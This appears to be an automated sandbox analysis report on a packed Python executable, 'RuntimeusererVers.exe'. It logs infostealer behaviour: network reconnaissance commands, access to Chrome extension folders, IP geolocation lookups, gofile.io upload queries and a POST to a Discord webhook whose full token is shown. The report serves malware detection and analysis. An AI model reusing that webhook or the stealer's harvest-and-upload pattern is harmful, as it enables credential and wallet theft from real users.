                      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD6F5000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000037.00000003.1583982311.000002255BAF4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDC69000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B7311000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: crypto\stack\stack.cOPENSSL_sk_dupOPENSSL_sk_deep_copysk_reserveOPENSSL_sk_new_reserveOPENSSL_sk_reserveOPENSSL_sk_insertOPENSSL_sk_seti=%dcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC3.1.4built on: Fri Nov 24 00:12:45 2023 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptoOPENSSL_atexitcrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdbcQ source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-7t032bmh\src\rust\target\release\deps\cryptography_rust.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: X509_SIGPKCS8_encrypt_excrypto\pkcs12\p12_p8e.cPKCS8_set0_pbe_excompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -aJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior

                      Networking

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                      Source: Yara matchFile source: Process Memory Space: RuntimeusererVers.exe PID: 8168, type: MEMORYSTR
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
                      Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Accept-Encoding: identityHost: geolocation-db.comUser-Agent: Python-urllib/3.11Connection: close
                      Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.8.4
                      Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.8.4
                      Source: global trafficDNS traffic detected: DNS query: geolocation-db.com
                      Source: global trafficDNS traffic detected: DNS query: discord.com
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: api.gofile.io
                      Source: global trafficDNS traffic detected: DNS query: store1.gofile.io
                      Source: unknownHTTP traffic detected: POST /api/webhooks/1306736758784004148/QAtKBhEgOSzIDzz8vpEyO3M9xeb24YVrDv87fdm717EJzQmVQQtRdLnTFwu9gwloToi1 HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.11 aiohttp/3.8.4Content-Length: 62Content-Type: application/json
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Fri, 15 Nov 2024 09:46:47 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.css
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.aiohttp.org/en/stable/logging.html#format-specification
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.aiohttp.org/en/stable/logging.html#format-specificationauvloopaset_event_loop_policyaEve
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.000002233426A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/post
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/jsonaqueryacountryacityatimezoneaispw
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7ED000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDE0EC000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
